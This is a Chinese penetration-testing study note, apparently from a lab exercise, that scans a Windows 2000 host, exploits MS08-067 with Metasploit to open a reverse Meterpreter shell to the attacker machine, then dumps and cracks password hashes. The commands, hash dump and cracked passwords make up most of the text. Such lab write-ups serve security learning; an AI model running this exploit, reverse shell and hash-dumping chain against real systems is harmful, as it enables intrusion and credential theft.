渗透测试学习笔记之案例二
0x00 前言
渗透是个持续的过程,不断地搜集信息,整理信息,以及利用信息,最终的目标就是拿到系统乃至整个网络的最高权限。在笔者看来,渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到实战之中。今天笔者将继续来分析渗透测试学习笔记系列的第二个案例。
0x01 案例分析
实验环境:
- 目标靶机:10.11.1.0/24
- 攻击机:Kali Linux (10.11.0.38)
渗透过程:
首先,一如既往的利用nmap来进行端口探测,比如我简单地探测了IP:10.11.1.227 如下:
# nmap -sV -O -Pn 10.11.1.227
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-11 07:08 CST
Stats: 0:04:03 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.11.1.227
Host is up (0.28s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc Microsoft Distributed Transaction Coordinator
5800/tcp open vnc-http RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5900)
5900/tcp open vnc VNC (protocol 3.8)
MAC Address: 00:50:56:89:71:CB (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.50%E=4%D=8/11%OT=135%CT=1%CU=42087%PV=Y%DS=1%DC=D%G=Y%M=005056%
OS:TM=598CE880%P=i686-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=I%TS=0)SEQ(S
OS:P=101%GCD=1%ISR=106%TI=I%II=I%SS=S%TS=0)OPS(O1=M529NW0NNT00NNS%O2=M529NW
OS:0NNT00NNS%O3=M529NW0NNT00%O4=M529NW0NNT00NNS%O5=M529NW0NNT00NNS%O6=M529N
OS:NT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=Y
OS:%T=80%W=FAF0%O=M529NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=
OS:)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G
OS:)IE(R=Y%DFI=S%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows 2000; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_2000
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 245.29 seconds分析上面的扫描结果后,我们得到如下信息:
- 目标主机开启了139,445端口且banner显示为Microsoft Windows 2000 microsoft-ds
- 目标主机开启了Windows RPC服务,端口为1025和1026
- 目标主机开启了RealVNC服务,端口为5800和5900
- 目标主机很可能是Windows 2000服务器
整理完了这些信息之后,接下来我们需要思考突破点了,一个常见的思路是针对开启的服务寻找可能的利用方法。
- 对于139和445端口,我们首先需要考虑的就是smb漏洞,比如:ms17-010,ms08-067等等
- 对于Windows RPC和VNC服务,我们不妨看看有没有现成的exploit可以使用
- 对于Windows 2000服务器,足够老的服务器早已不再有补丁支持,是否可以被利用
诚如我之前所说,渗透测试要善于利用已知漏洞,可以利用搜索引擎检索,也可以利用一些漏洞利用数据库去查询(如:exploit-db, securityfocus等),还可以直接借助已有的渗透测试工具(如:nmap的NSE脚本,Metasploit的exploit模块,自己平时搜集的漏洞利用,等等)。
继续回到我们的目标主机(10.11.1.227),由于存在smb服务且目标主机很可能为Windows 2000服务器,一个简单的猜想便是是否存在ms08-067漏洞。为了验证我们的猜想,先用nmap扫描一下:
# nmap --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse -sT -Pn 10.11.1.227
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-11 08:59 CST
Nmap scan report for 10.11.1.227
Host is up (0.26s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1029/tcp open ms-lsa
3372/tcp open msdtc
5800/tcp open vnc-http
5900/tcp open vnc
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.11.1.227
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.11.0.38:4444
[*] 10.11.1.227:445 - Automatically detecting the target...
[*] 10.11.1.227:445 - Fingerprint: Windows 2000 - Service Pack 0 - 4 - lang:English
[*] 10.11.1.227:445 - Selected Target: Windows 2000 Universal
[*] 10.11.1.227:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 10.11.1.227
[*] Meterpreter session 2 opened (10.11.0.38:4444 -> 10.11.1.227:1256) at 2017-08-11 08:39:12 +0800
meterpreter >果然,目标主机存在ms08-067漏洞,并且我们成功地获得了一个meterpreter会话。一旦有了meterpreter会话,我们需要考虑以下几个问题:
- 当前运行的账户权限是不是SYSTEM且是否需要提权
- 目标机器的系统信息是什么
- 目标机器是否存在反病毒程序影响我们的后渗透操作
- 目标机器上有哪些用户和组且是否存在域用户(如:域管理员账户)
- 目标机器上是否可以dump hash(可用来破解密码或者Pass The Hash攻击)
- 等等
如下一些常见的meterpreter和shell命令可以帮我们轻松地确认以上的问题:
getuid – 获取当前运行用户
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMmeterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > sysinfo
Computer : JD
OS : Windows 2000 (Build 2195).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x86/windowsmeterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] x86
8 0 System x86 0 NT AUTHORITY\SYSTEM
172 8 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
196 172 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINNT\system32\csrss.exe
216 172 WINLOGON.EXE x86 0 NT AUTHORITY\SYSTEM \??\C:\WINNT\system32\winlogon.exe
244 216 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\services.exe
256 216 LSASS.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\lsass.exe
452 244 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\svchost.exe
480 244 SPOOLSV.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\spoolsv.exe
512 244 msdtc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\msdtc.exe
616 244 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\svchost.exe
644 244 LLSSRV.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\llssrv.exe
676 244 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM C:\PROGRA~1\MICROS~3\MSSQL\binn\sqlservr.exe
748 244 regsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\regsvc.exe
772 244 sqlagent.exe x86 0 NT AUTHORITY\SYSTEM C:\PROGRA~1\MICROS~3\MSSQL\binn\sqlagent.exe
784 244 mstask.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\MSTask.exe
812 244 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\snmp.exe
860 244 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
936 244 winmgmt.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\WBEM\WinMgmt.exe
948 244 winvnc4.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\RealVNC\VNC4\WinVNC4.exe
960 244 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\svchost.exe
980 244 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\inetsrv\inetinfo.exe
992 244 mssearch.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\System\MSSearch\Bin\mssearch.exe
1092 244 dfssvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\system32\Dfssvc.exe
1580 244 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINNT\System32\svchost.exemeterpreter > hashdump
admin:1007:a46139feaaf2b9f117306d272a9441bb:c5e0002fde3f5eb2cf5730ffee58ebcc:::
Administrator:500:7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af:::
backup:1006:16ac416c2658e00daad3b435b51404ee:938df8b296dd15d0dce8eaa37be593e0:::
david:1009:43af16fff22f1628aad3b435b51404ee:1fbff38cae51e9918da1fec572f03e11:::
gary:1013:998d9dc042886317c72befe227197ae1:ba359fa9d25791c2180e424bb7bb0753:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
homer:1017:ef91a6d3cf901b8baad3b435b51404ee:b184d292a82b6ad35c3cfca81f1f59bc:::
IUSR_SRV2:1020:f7d96ebcbe5b6be3103ccb00190f6271:09ff503707453d56bb69f40bef542da0:::
IWAM_SRV2:1019:96fe1fc02d73a84c463db170b09126f1:be6ec26d0d71a533e14b65ce755d7bce:::
john:1010:e52cac67419a9a2238f10713b629b565:5835048ce94ad0564e29a924a03510ef:::
lee:1015:b096847ead9b7476aad3b435b51404ee:208adb08381adab3032eedbd35399642:::
lisa:1011:a179639dcaf4e1c4aad3b435b51404ee:8acf28fdc0168e003fb3e05bcb463d1b:::
mark:1012:6c3d4c343f999422aad3b435b51404ee:bcd477bfdb45435a34c6a38403ca4364:::
ned:1016:836eda0fbc609e6393e28745b8bf4ba6:4f16328129408ed105dec3a938c266eb:::
nick:1014:59b8b93a9a6477e4aad3b435b51404ee:ee28ad35a22c752c1a75be3f9a7e82c9:::
simon:1008:598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf:::
sqlusr:1005:6307ab24156c541aaad3b435b51404ee:6a370590bd44ac8e65d045254a170ab7:::
todd:1018:9e00b755e79c8cf95533b366e9511e4b:4150133921fe34dd2e777b1ca0361410:::
TsInternetUser:1000:e52cac67419a9a22f96f275e1115b16f:e22e04519aa757d12f1219c4f31252f4:::meterpreter > shell
Process 760 created.
Channel 1 created.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>net users
net users
User accounts for \\
-------------------------------------------------------------------------------
admin Administrator backup
david gary Guest
homer IUSR_SRV2 IWAM_SRV2
john lee lisa
mark ned nick
simon sqlusr todd
TsInternetUser
The command completed with one or more errors.
C:\WINNT\system32>net view /domain
net view /domain
Domain
-------------------------------------------------------------------------------
MYGROUP
THINC
WORKGROUP
The command completed successfully.
C:\WINNT\system32>ipconfig -all
ipconfig -all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : jd
Primary DNS Suffix . . . . . . . : acme.local
Node Type . . . . . . . . . . . . : Mixed
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : acme.local
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-89-5E-EC
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.11.1.227
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.11.1.220
DNS Servers . . . . . . . . . . . : 10.11.1.220
10.11.1.221
C:\WINNT\system32>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
backup
The command completed successfully.
C:\WINNT\system32>net view
net view
Server Name Remark
-------------------------------------------------------------------------------
\\BETHANY
\\BOB2
\\CORY
\\GAMMA
\\MAIL thincmail
\\MIKE mike
\\SHERLOCK
The command completed successfully.后渗透过程中的一个重要步骤就是Dump Hash,有了密码hash我们就可以来尝试破解密码以及Pass The Hash攻击了。通过上面的一系列信息获取,我们已经知道了目标系统是Windows 2000并了解到这些Hash都是易破解的LM Hash, 因此我们可以尝试去破解这些Hash来获取明文的密码,破解结果如下:
user: backup
Hash: 16ac416c2658e00daad3b435b51404ee:938df8b296dd15d0dce8eaa37be593e0
Password: backup
user: Administrator
Hash: 7bfd3ee62cbb0eba886450c5d6c50f12:f3acbe7ec27aadbe8deeaa0c651a64af
Password: 7A6417Yrjh
user: admin
Hash: a46139feaaf2b9f117306d272a9441bb:c5e0002fde3f5eb2cf5730ffee58ebcc
Password: CHANGEME
User: david
Hash: 43af16fff22f1628aad3b435b51404ee:1fbff38cae51e9918da1fec572f03e11:::
Password: 012345
User: gary
Hash: 998d9dc042886317c72befe227197ae1:ba359fa9d25791c2180e424bb7bb0753:::
Password: REDGREENBLUE
User: john
Hash: e52cac67419a9a2238f10713b629b565:5835048ce94ad0564e29a924a03510ef:::
Password: password1
... ...注:http://www.objectif-securite.ch/en/ophcrack.php 一个在线的LMHash破解网站
至此,我们已经完全控制了目标机器并获取到了一些用户的明文密码以便为后期的持续渗透做准备。
0x02 小结
总结一下本案例中的渗透测试方法和思路:
- nmap扫描目标主机常见端口
- 分析和整理可能存在漏洞的服务
- 搜索和验证存在漏洞的服务
- 利用服务漏洞获取系统shell
- 判断是否需要提权操作
- 获取密码hash并破解用户明文密码
- 整理明文密码表为持续渗透做准备